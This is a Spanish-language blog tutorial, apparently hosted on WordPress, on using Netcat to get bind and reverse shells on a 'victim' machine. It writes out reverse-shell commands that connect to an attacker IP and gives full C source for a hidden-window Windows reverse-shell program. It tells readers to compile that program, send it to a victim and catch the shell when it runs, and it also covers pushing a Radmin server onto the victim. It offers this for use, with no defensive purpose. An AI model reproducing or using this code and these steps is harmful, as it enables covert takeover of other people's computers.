Netcat Tuto

Como muchos sabréis NetCat se ha venido haciendo más famoso cada día. Esta fantástica herramienta que nos permite hacer muchísimas cosas… Desde montar un chat, hasta enviar ficheros o averiguar datos sonbre un web, por ello NetCat (ó NC) se ha ido convirtiendo tan famoso.

En este manual no voy a explicar cómo hacer un chat, ni ninguna de sus cualidades, lo que voy a intentar explicar es cómo conseguir una shell (una consola, una terminal, un programa de comandos etc) haciendo uso de él.

Preparándose

Pues bien, lógicamente lo primero que necesitamos es NetCat. Lo podéis encontrar en google, por inet. Buscad bien, sino en nuestra web está subido, en la parte de Herramientas.

De momento sólo necesitamos eso, cuando vayan surgiendo más cosas os las iré explicando.

Por cierto, también ncesitamos una shell, tanto de windows como de Linux o del SO que sea.

Los de Linux podéis encontrar NC en sourceforge por ejemplo, en cuanto a lo usuarios de Windows, una vez que lo bajéis descomprimidlo en system32, para hacer más fácil su manejo.

Víctima y atacante

Bueno, quería dejar una cosa clara antes de comenzar. Este texto lo he escrito en mi máquina de windows, asi que el atacante será 192.168.1.33 con sun SO de windows, y la víctima será
192.168.1.34 con un SO de Linux. Dicho esto pasemos a la acción.

Obtener una shell directamente:

Una shell directa es bastante fácil de lograr, pero no es la más recomendada, conforme vayáis leyendo os daréis cuenta de sus desventajas.

Para lograr una shell directa el equipo víctima tiene que ejecutar el siguiente comando:

Código:
nc -l -e /bin/sh -p 6000

Os preguntaréis, y qué es todo eso? Pues os lo explico:

nc           Ahí invocamos al NetCat
-l            Para poner a la escucha un puerto
-e           Sirve para llamar a la ejecución de un programa.
/bin/sh   Es la shell de Linux, en windows sería cmd.exe
-p           Para indicar qué puerto queremos poner a la escucha

De tal manera que lo que hacemos en la víctima es poner a la escucha el puerto 6000, sirviendo para alguna conexión remota el programa /bin/sh, que es la shell de Linux. Si la víctima es un SO Windows, este progama sería cmd.exe.

Una vez hecho eso en la víctima nos queda conectar con ella, con la máquina atacante. Para ello simplemente indicamos IP y PUERTO:

nc -vv <IP> <PUERTO>

Donde:
-vv    Sirve para dar más datos, es decir, datos detallado de la
conexión.
<IP>  Aquí va la IP de la víctima.
<PUERTO> Aquí el Puerto de conexión.

En mi ejemplo el comando quedó de la siguiente manera:

Código:
nc -vv 192.168.1.34 6000


Y obtení una shell de mi máquina Linux, hice un dir y me devolvió los datos:

NOTA: En este ejemplo no aparece el clásico “c:\” porque la víctima es un SO Linux, si fuera un Windows si aparecería.Otra cosa importante a decir es que si tenemos un router o firewall, debéis abrir los puertos, sino nada servirá.

Obtener una shell inversa:

Para mí, para mí… esta es la manera más eficaz de obtener una shell, porque tú no te conectas a tu víctima, es ella quien se conecta a ti.
Veámoslo con un ejemplo:

En la máquina atacante pongo este comando:

Código:
nc -vv -l -p 6000


De manera que pongo a la escucha el puerto 6000.

En mi máquina víctima (Linux) pongo el siguiente comando:

Código:
nc -e /bin/sh 192.168.1.33 6000


Así creo que lo entendemos mejor. Es decir, la víctima sirve la shell y se conecta al atacante. Esto tiene muchas ventajas, ya que si por ejemplo tienes una víctima con IP Dinámica (la IP cambia cada X tiempo) no podrás tenerla como víctima el tiempo que quieras, y cuando intentes conectar no podrás porque su IP habrá cambiado. Pero si n cambio es ella la que se conecta a ti, ahí estás ganando, porque tú puedes ponerte un dominio NO-IP por ejemplo, y cada vez que te pongas a la escucha recibirás la shell.

De manera que comprobado con mis dos máquinas, funciona:

Hasta ahora os estaréis preguntando esto: ¿De qué sirve el NetCat si hay que tener acceso físico a la PC? Pues no. No necesariamene hay que tener acceso físico a la PC. Aquí os dejo un exploit para windows (para Linux no hay virus, ni exploit ni nada  [si los hay pero no de NetCat]) con el que podréis recibir una shell inversa:

Código:
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,”ws2_32″)
int main(int argc, char *argv[])
{
ShowWindow(GetForegroundWindow(),SW_HIDE);
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in addr;
memset(&addr,0,sizeof(addr));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
addr.sin_family = AF_INET;
addr.sin_port = htons(PUERTO); //Atencion a esta linea, aki va el
puerto de conexion NetCat
addr.sin_addr.s_addr = inet_addr(“AKI TU IP O DOMINIO
NO-IP”);//Atencion a esta linea, aki va tu IP
connect(hSocket,(struct sockaddr*)&addr,sizeof(addr));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
CreateProcess(NULL,”cmd”,NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
ExitProcess(0);
}

Esto es un código en C++, sólo debéis cambiarle un par de cosillas. Una vez cambiadas lo único que tenéis que hacer es compilarlo y hacer un EXE, para ello podéis usar DevC++ o vuestro compilador preferido. Enviáis este ejecutable, y os ponéis a la escucha con el puerto que hayáis puesto, y cuando tu víctima lo ejecuta ya tendrás una shell inversa.

También podeis programar un BAT, que descarga el NC y haga la conexión.

Además del BAT y del código en C hay muchas utilidades por ahí, por ejemplo, esta:

http://venus.walagata.com/w/nc2k5/1401581.rar

Y buscando por google encontraréis más.

Enviar y recibir archivos con NetCat:

Para poder enviar y recibir archivos con NetCat (ojo, por NetCat, no por tFTP ni nada de eso) es necesario ejecutar comandos en ambas máquinas, apuntando al archivo que se quiera mandar, de la siguiente forma:

Suponiendo que el atacante quiere enviar un servidor Radmin a la víctima:

Código:
nc <IP> <PUERTO> < “Archivo”

Y para recibir:

Código:
nc -l -p <PUERTO> > “Archivo”

De tal manera que si quiero enviar: r_server.exe haré:

Código:
nc 192.168.1.34 6000 < “r_server.exe”


Y en la máquina víctima:

Código:
nc -l -p 6000 > “r_server.exe”

Nota: La transferencia de archivos por NetCat es muy básica y se aconseja no usarla, puede ser lenta y mala.

Otros métodos de transferencia de archivos:

Al ser la transferencia por NetCat “mala y lenta”, podemos usar otros métodos de transferencia de archivos, una vez que hayamos conseguido shell.

Uno de ellos es el tFTP, del cual no voy a explicar nada porque no viene a cuento, pero podéis buscar manuales en google.

Otro método de transferencia es FTP, un cliente FTP lo tiene cualquier SO por defecto, sólo hay que conectarse al servidor FTP y de ahí descargar; igual que con tFTPpodéis buscar algún manual.

Bueno, aquí termina el manual de NetCat, espero que lo haya explicado todo bien, por lo menos lo he intentado, si queréis hacerme alguna sugerencia sobre qué ponerle más o lo que sea, decídmelo ya! xD.

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s